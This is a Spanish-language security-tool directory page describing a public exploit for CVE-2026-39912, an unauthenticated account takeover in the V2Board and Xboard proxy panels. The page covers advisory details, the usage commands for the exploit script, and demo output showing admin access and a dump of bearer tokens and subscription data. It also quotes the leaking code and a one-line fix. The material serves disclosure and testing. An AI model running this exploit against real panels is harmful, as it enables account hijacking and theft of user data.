Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39912 — Xboard / V2Board Toma de control de cuenta sin autenticación - Fuga de token de enlace mágico (CVE-2026-39912) | Kitploit
Herramientas/GitHubGitHub/chocapikk/cve-2026-39912
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board Toma de control de cuenta sin autenticación - Fuga de token de enlace mágico (CVE-2026-39912)

Ver Repositorio
21hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Sitio web
Compartir

CVE-2026-39912 - Xboard / V2Board Toma de Control de Cuenta sin Autenticación

Fuga de Token de Enlace Mágico en loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (Crítico)
CWECWE-201 (Inserción de Información Sensible en Datos Enviados)
AfectadosV2Board >= 1.6.1 hasta 1.7.4 / Xboard todas las versiones hasta 0.1.9+
CorregidoAún no (V2Board abandonado desde junio de 2023)
Divulgado2026-04-09
CréditoValentin Lobstein (Chocapikk)
Informechocapikk.com
PRs de correcciónV2Board #981 / Xboard #873

Resumen

El endpoint loginWithMailLink devuelve el enlace de inicio de sesión mágico directamente en el cuerpo de la respuesta HTTP en lugar de enviarlo únicamente por correo electrónico. Un atacante no autenticado que conozca un correo electrónico registrado puede tomar el control de cualquier cuenta, incluida la de administrador, con dos peticiones HTTP.

Software Afectado

  • V2Board - Panel de gestión de protocolos proxy de código abierto (8,7k estrellas, abandonado)
  • Xboard - Bifurcación de V2Board (4k+ estrellas, mantenido activamente)

Ambos son paneles VPN/proxy ampliamente desplegados, principalmente en China. ZoomEye muestra más de 7.000 instancias expuestas en internet.

Requisitos

  • login_with_mail_link_enable debe estar habilitado en la configuración de administrador (no está habilitado por defecto)
  • Una dirección de correo electrónico registrada válida

Uso

root@kitploit:~
# Instalar dependencias
pip install requests

# Toma de control de cuenta + volcado de datos
python3 exploit.py http://target:7001 [email protected]

# Guardar volcado en un archivo
python3 exploit.py http://target:7001 [email protected] -o dump.json

Demo

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Toma de Control de Cuenta sin Autenticación
 Fuga de Token de Enlace Mágico (CVE-2026-39912) | por Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min desde git clone hasta is_admin: true

[INFO] Solicitando enlace mágico para [email protected]
[INFO] Filtrado: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Autenticado (admin=True)
[INFO] Información de Usuario: OK
[INFO] Suscripción: OK
[INFO] Sesiones Activas: OK
[INFO] Estadísticas: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

El Fallo

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token filtrado a quien llama
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Mismo fallo, heredado de la bifurcación

La Corrección

root@kitploit:~
- return [true, $link];
+ return [true, true];

Referencias

  • V2Board - Código vulnerable (línea 71)
  • Xboard - Código vulnerable (línea 49)
  • Commit original que introdujo el fallo (2022-06-27)
Descargar herramienta